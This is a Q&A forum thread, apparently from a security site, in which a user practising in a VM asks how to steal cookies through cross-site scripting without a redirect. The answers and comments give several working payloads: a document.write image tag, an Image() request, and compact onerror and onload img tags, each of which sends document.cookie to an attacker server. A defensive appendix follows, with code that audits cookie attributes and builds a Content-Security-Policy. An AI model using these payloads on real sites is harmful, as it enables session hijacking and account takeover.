Monday, January 21, 2019


I'm practicing in a VM following the OWASP guide. I know that it is possible to steal the cookie by redirecting to a "false" page etc., but I would like to steal the cookie without redirecting to another page.
So, if you have some guestbook and then you put:
document.location = "http://www.example.com/cookie_catcher.php?c=" + document.cookie
How can I put this into an existing page without redirecting?
Basically, what I want is: when someone clicks on the link, grab the cookie and print it somewhere on the current page. Maybe in some alt tag or whatever.
Any ideas?
  • Google changed the way cookies are written. I can't get session cookies using the above method. – user63648 Dec 16 '14 at 20:40

2 Answers

If you have full control of the JavaScript getting written to the page, then you could just do
document.write('cookie: ' + document.cookie)
If you want it sent to another server, you could include it in a non-existent image:
document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />')
The key here is whether you can output arbitrary JavaScript or whether you're limited in the kind of JavaScript you can get executed. Though if you're limited in what can be output, you could use more advanced methods of getting your custom code to execute, which are a bit out of scope of the question.
  • 6
    And you can even request it without writing to the document: image = new Image(); image.src='http://example.com?c='+document.cookie; – НЛО May 23 '14 at 9:24
  • I cannot edit your post, but there is a missing quote: />) should be />'). Thanks anyway, excellent answer – Alain Tiemblo Feb 25 '15 at 15:46
  • This should not be the case if the cookie is marked with the HttpOnly attribute. – Joaquin Brandan Mar 25 at 17:43
To add onto Steve's answer, there are many different ways to achieve this. If your intention is to not have the user be aware of the stolen cookie, I would suggest the <img> attack Steve suggested. Although I prefer avoiding document.write, since it uses up so many characters:
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
  • This is nice and compact, but the problem is that it will recursively trigger the onerror handler unless an image is served from the attacker's page. – multithr3at3d Jun 4 at 20:47
  • I use this approach, but as the source you can use an existing image and use the onload attribute for the payload: <img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://yourserver/?'+document.cookie> – coffeemakr Dec 15 at 16:00
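Added example (not from either answer or any commenter): every payload in this thread reads document.cookie and ships it through an image request, so the two server-side controls that break it are an HttpOnly session cookie (as noted in the comment above) and a Content-Security-Policy whose img-src/connect-src pin requests to the site's own origin. The helpers below audit a Set-Cookie header for the missing attributes and build the hardened header and CSP; the function names, the required-attribute list, and the sample cookie value are assumptions.

```javascript
// Attributes a session cookie should carry. HttpOnly keeps the value out of
// document.cookie (the source every payload above reads), Secure keeps it off
// plaintext HTTP, SameSite limits sending on cross-site requests.
const REQUIRED_ATTRS = ['HttpOnly', 'Secure', 'SameSite'];

// Parse one Set-Cookie header into its name/value pair and an attribute map
// (attribute keys lower-cased; flag attributes such as HttpOnly map to true).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    cookie.attrs[key] = i === -1 ? true : a.slice(i + 1);
  }
  return cookie;
}

// Return the required attributes a Set-Cookie header is missing (empty = ok).
function auditSetCookie(header) {
  const { attrs } = parseSetCookie(header);
  return REQUIRED_ATTRS.filter((a) => !(a.toLowerCase() in attrs));
}

// Build a hardened session cookie header.
function buildSessionCookie(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// CSP that pins image loads and fetch/XHR to the site's own origin, so an
// injected <img src="http://yourserver/..."> or Image() request is refused by
// the browser instead of being sent.
function buildCsp() {
  return "default-src 'self'; img-src 'self'; connect-src 'self'; script-src 'self'";
}

// Constructed sample: the weak header beside the hardened one.
const WEAK = 'PHPSESSID=abc123; Path=/';
const HARDENED = buildSessionCookie('PHPSESSID', 'abc123');

console.log('weak header is missing:', auditSetCookie(WEAK));      // [ 'HttpOnly', 'Secure', 'SameSite' ]
console.log('hardened header is missing:', auditSetCookie(HARDENED)); // []
console.log('Content-Security-Policy:', buildCsp());
```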